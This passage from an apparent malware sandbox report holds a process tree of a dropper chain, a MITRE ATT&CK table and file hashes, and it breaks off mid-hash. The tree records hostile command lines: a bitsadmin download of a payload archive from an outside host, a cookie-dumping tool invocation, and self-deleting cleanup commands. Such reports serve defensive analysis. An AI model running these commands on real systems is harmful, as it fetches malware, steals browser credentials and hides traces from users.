                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lc3lgmkk.3gq\SunLabsPlayer.exe /S & exit
                                                                  6⤵
                                                                    PID:3828
                                                                    • C:\Users\Admin\AppData\Local\Temp\lc3lgmkk.3gq\SunLabsPlayer.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\lc3lgmkk.3gq\SunLabsPlayer.exe /S
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in Program Files directory
                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                      PID:3840
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:2640
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:2680
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:808
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                              8⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:2656
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:3332
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:3656
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                  • Checks for any installed AV software in registry
                                                                                  PID:2380
                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                  8⤵
                                                                                  • Download via BitsAdmin
                                                                                  PID:3428
                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  PID:3988
                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1432
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                  • Drops file in Program Files directory
                                                                                  PID:3168
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:3992
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:3912
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:3536
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                      • Drops file in Program Files directory
                                                                                      PID:2928
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                      8⤵
                                                                                        PID:7608
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                          9⤵
                                                                                          • Drops file in System32 directory
                                                                                          PID:7616
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:7656
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Drops file in Program Files directory
                                                                                          PID:7936
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Drops file in Program Files directory
                                                                                          PID:8176
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Drops file in Program Files directory
                                                                                          PID:2396
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd9159.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:7608
                                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:7996
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies system certificate store
                                                                                PID:1628
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                  3⤵
                                                                                    PID:2084
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping 127.0.0.1
                                                                                      4⤵
                                                                                      • Runs ping.exe
                                                                                      PID:2124
                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2460
                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Adds Run key to start application
                                                                                  • Modifies system certificate store
                                                                                  PID:1960
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:964
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    3⤵
                                                                                      PID:2084
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:7692
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4000
                                                                                • C:\Windows\system32\conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe "58340848-4047220231905336893-514644221-81851064-1636126547-1826691076301954344"
                                                                                  1⤵
                                                                                    PID:3156
                                                                                  • C:\Windows\system32\conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe "-1536670051-3219233068428969561840215893-1485021407-666002302207522720-539180351"
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2604
                                                                                  • C:\Users\Admin\AppData\Local\Temp\AB4D.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\AB4D.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:7520
                                                                                  • C:\Users\Admin\AppData\Local\Temp\B5AA.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\B5AA.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:1804
                                                                                  • C:\Users\Admin\AppData\Local\Temp\CC46.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\CC46.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:7684
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                      2⤵
                                                                                        PID:7800
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout 1
                                                                                          3⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:7836
                                                                                      • C:\Users\Admin\AppData\Local\Temp\CC46.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\CC46.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks processor information in registry
                                                                                        • Modifies system certificate store
                                                                                        PID:7856
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im CC46.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CC46.exe" & del C:\ProgramData\*.dll & exit
                                                                                          3⤵
                                                                                            PID:8140
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im CC46.exe /f
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:8188
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              timeout /t 6
                                                                                              4⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:7544
                                                                                      • C:\Users\Admin\AppData\Local\Temp\D9AF.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\D9AF.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:7708
                                                                                        • C:\Users\Admin\AppData\Local\Temp\D9AF.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\D9AF.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:7804
                                                                                      • C:\Users\Admin\AppData\Local\Temp\E219.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\E219.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:8032
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:8104
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                            PID:7956
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:3136
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:4600
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:7504
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:7500
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:932
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:8180
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:3096

                                                                                            Network

                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                            Execution

                                                                                            Scheduled Task

                                                                                            1
                                                                                            T1053

                                                                                            Persistence

                                                                                            Registry Run Keys / Startup Folder

                                                                                            1
                                                                                            T1060

                                                                                            Scheduled Task

                                                                                            1
                                                                                            T1053

                                                                                            BITS Jobs

                                                                                            1
                                                                                            T1197

                                                                                            Privilege Escalation

                                                                                            Scheduled Task

                                                                                            1
                                                                                            T1053

                                                                                            Defense Evasion

                                                                                            Disabling Security Tools

                                                                                            2
                                                                                            T1089

                                                                                            Modify Registry

                                                                                            5
                                                                                            T1112

                                                                                            BITS Jobs

                                                                                            1
                                                                                            T1197

                                                                                            Install Root Certificate

                                                                                            1
                                                                                            T1130

                                                                                            Credential Access

                                                                                            Credentials in Files

                                                                                            5
                                                                                            T1081

                                                                                            Discovery

                                                                                            Software Discovery

                                                                                            1
                                                                                            T1518

                                                                                            Security Software Discovery

                                                                                            1
                                                                                            T1063

                                                                                            Query Registry

                                                                                            4
                                                                                            T1012

                                                                                            System Information Discovery

                                                                                            5
                                                                                            T1082

                                                                                            Peripheral Device Discovery

                                                                                            2
                                                                                            T1120

                                                                                            Remote System Discovery

                                                                                            1
                                                                                            T1018

                                                                                            Collection

                                                                                            Data from Local System

                                                                                            5
                                                                                            T1005

                                                                                            Command and Control

                                                                                            Web Service

                                                                                            1
                                                                                            T1102

                                                                                            Replay Monitor

                                                                                            Loading Replay Monitor...

                                                                                            Downloads

                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                              MD5

                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                              SHA1

                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                              SHA256

                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                              SHA512

                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                              MD5

                                                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                                                              SHA1

                                                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                              SHA256

                                                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                              SHA512

                                                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                            • C:\Program Files\Mozilla Firefox\VWFHSOJBND\ultramediaburner.exe
                                                                                              MD5

                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                              SHA1

                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                              SHA256

                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                              SHA512

                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                            • C:\Program Files\Mozilla Firefox\VWFHSOJBND\ultramediaburner.exe
                                                                                              MD5

                                                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                                                              SHA1

                                                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                                                              SHA256

                                                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                              SHA512

                                                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                            • C:\Program Files\install.dat
                                                                                              MD5

                                                                                              806c3221a013fec9530762750556c332

                                                                                              SHA1

                                                                                              36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                              SHA256

                                                                                              9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                              SHA512

                                                                                              56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                            • C:\Program Files\install.dll
                                                                                              MD5

                                                                                              fe60ddbeab6e50c4f490ddf56b52057c

                                                                                              SHA1

                                                                                              6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                              SHA256

                                                                                              9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                              SHA512

                                                                                              0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                                                              MD5

                                                                                              15775d95513782f99cdfb17e65dfceb1

                                                                                              SHA1

                                                                                              6c11f8bee799b093f9ff4841e31041b081b23388

                                                                                              SHA256

                                                                                              477a9559194edf48848fce59e05105168745a46bdc0871ea742a2588ca9fbe00

                                                                                              SHA512

                                                                                              ac09ce01122d7a837bd70277badd58ff71d8c5335f8fc599d5e3ed42c8fee2108dd043bce562c82ba12a81b9b08bd24b961c0961bf8fd3a0b8341c87483cd1e7

                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                              MD5

                                                                                              3dd9c91a67718703c2c094847f6180ba

                                                                                              SHA1

                                                                                              b2e15b2e2285936600619306029acc00ade18cda

                                                                                              SHA256

                                                                                              fdfe96778486d1f6d2f898cb2106050113ec26d7042e93b61ba5050cb245a1de

                                                                                              SHA512

                                                                                              773054183d510b4bc2938b43ebf3380f89c3b247dc73b56f0f16e76c9dc73e9d46155cc356f47ce0bb260309ebbb33d5d19f858f9fba9e1a5ec3b3e10fb95642

                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                              MD5

                                                                                              6e5ef074d8c4984d41347eead62bb25d

                                                                                              SHA1

                                                                                              6773a5a698fc578a248c6fe6d088fe44aa185e19

                                                                                              SHA256

                                                                                              e07fd69f02a908ef178c5218fe9f5532cf3971d2762409638434b0b3cac8674a

                                                                                              SHA512

                                                                                              88e4dd078dd766a882e363eb5d8f8a0bb2e6777fb807d77716c5f612a0fff2c4876ba3ae771bf19e1314041f6ccdc50cd80a2cae40e928bbacb5cc31e0f06846

                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                              MD5

                                                                                              662a4734a744cd2df27b79f166ea2bba

                                                                                              SHA1

                                                                                              a8e7b5a7cfc692ef098016cc748ce70a6b0967f6

                                                                                              SHA256

                                                                                              83adf7d0f9ad40f53811fbe3873a008573f549d132ea22fc3fd37648c2feca50

                                                                                              SHA512

                                                                                              5b25ad0c6eae84268013346f3655f0d942ac65ca5f6c8ecb52609157c61f19acbbdad6dc0795fd3d59d31caf404e55897f4c55866680f4f99015c08ea8950b56

                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                              MD5

                                                                                              9c12402383cccd103f690133f6e377cc

                                                                                              SHA1

                                                                                              82b95ce07328c71e88ab86b68a43197cf9277be6

                                                                                              SHA256

                                                                                              6466853b3e79eb5d004129586718848c381b74bac73b0f55d848a25cf81758f0

                                                                                              SHA512

                                                                                              b0bf3d48b04faf3f3d8b7e79c2b24d853b9ec081243ddc42224d51053588b97ba8761478606d0b86e3d5a40565dba2b6303c749b339e4024044e282884192d0a

                                                                                            • C:\Users\Admin\AppData\Local\Temp\38-cdccd-c56-63cab-c0b0f920128bf\Linyhashaeli.exe
                                                                                              MD5

                                                                                              1f19330a59c0369f5d0b77b02f275568

                                                                                              SHA1

                                                                                              0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                              SHA256

                                                                                              f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                              SHA512

                                                                                              3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                            • C:\Users\Admin\AppData\Local\Temp\38-cdccd-c56-63cab-c0b0f920128bf\Linyhashaeli.exe
                                                                                              MD5

                                                                                              1f19330a59c0369f5d0b77b02f275568

                                                                                              SHA1

                                                                                              0958f885ff49c94e5b0ae11204db59f031c63fbc

                                                                                              SHA256

                                                                                              f2f52b25eee4a21ebe2763fb3b0925c3ab31a6ef53c884c007f221b1c288d6a1

                                                                                              SHA512

                                                                                              3123036eaa3ff849c140d79abe453999be02e1823f673c150a0544cef20af5a1db69d1de5f4add7ab85eea06c2fea9fc824c989e13b38c1a2d7455c3ff81eaf1

                                                                                            • C:\Users\Admin\AppData\Local\Temp\38-cdccd-c56-63cab-c0b0f920128bf\Linyhashaeli.exe.config
                                                                                              MD5

                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                              SHA1

                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                              SHA256

                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                              SHA512

                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                            • C:\Users\Admin\AppData\Local\Temp\3c-88ddb-16c-7578d-0f82600f39895\Kaemovigydo.exe
                                                                                              MD5

                                                                                              c0cf9a2aa73be476329a8ffd03c17b19

                                                                                              SHA1

                                                                                              c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                              SHA256

                                                                                              f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                              SHA512

                                                                                              32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                            • C:\Users\Admin\AppData\Local\Temp\3c-88ddb-16c-7578d-0f82600f39895\Kaemovigydo.exe
                                                                                              MD5

                                                                                              c0cf9a2aa73be476329a8ffd03c17b19

                                                                                              SHA1

                                                                                              c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                              SHA256

                                                                                              f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                              SHA512

                                                                                              32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                            • C:\Users\Admin\AppData\Local\Temp\3c-88ddb-16c-7578d-0f82600f39895\Kaemovigydo.exe.config
                                                                                              MD5

                                                                                              98d2687aec923f98c37f7cda8de0eb19

                                                                                              SHA1

                                                                                              f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                              SHA256

                                                                                              8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                              SHA512

                                                                                              95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                              MD5

                                                                                              41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                              SHA1

                                                                                              0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                              SHA256

                                                                                              97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                              SHA512

                                                                                              5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                              MD5

                                                                                              41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                              SHA1

                                                                                              0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                              SHA256

                                                                                              97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                              SHA512

                                                                                              5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                              MD5

                                                                                              3b1b318df4d314a35dce9e8fd89e5121

                                                                                              SHA1

                                                                                              55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                              SHA256

                                                                                              4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                              SHA512

                                                                                              f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                              MD5

                                                                                              3b1b318df4d314a35dce9e8fd89e5121

                                                                                              SHA1

                                                                                              55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                              SHA256

                                                                                              4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                              SHA512

                                                                                              f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\John_Ship.url
                                                                                              MD5

                                                                                              72825692a77bb94e1f69ef91bfbbff15

                                                                                              SHA1

                                                                                              db898f541f5e6e4305dfe469494d0ed1d4950395

                                                                                              SHA256

                                                                                              6e57ce08a3feecbb59a5b257660cc517793f1adb20b75d36a9d12f921fc826e7

                                                                                              SHA512

                                                                                              9a2c3ba9be966bb6f3ebf188578fa335a2583ce9c3ae94cbe3a044b02a339a9ca22b4a31e8c6076c720c8632fca6d1ebbc7a4575d0fe463cb4c526c187e333b8

                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                              MD5

                                                                                              3bc84c0e8831842f2ae263789217245d

                                                                                              SHA1

                                                                                              d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                              SHA256

                                                                                              757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                              SHA512

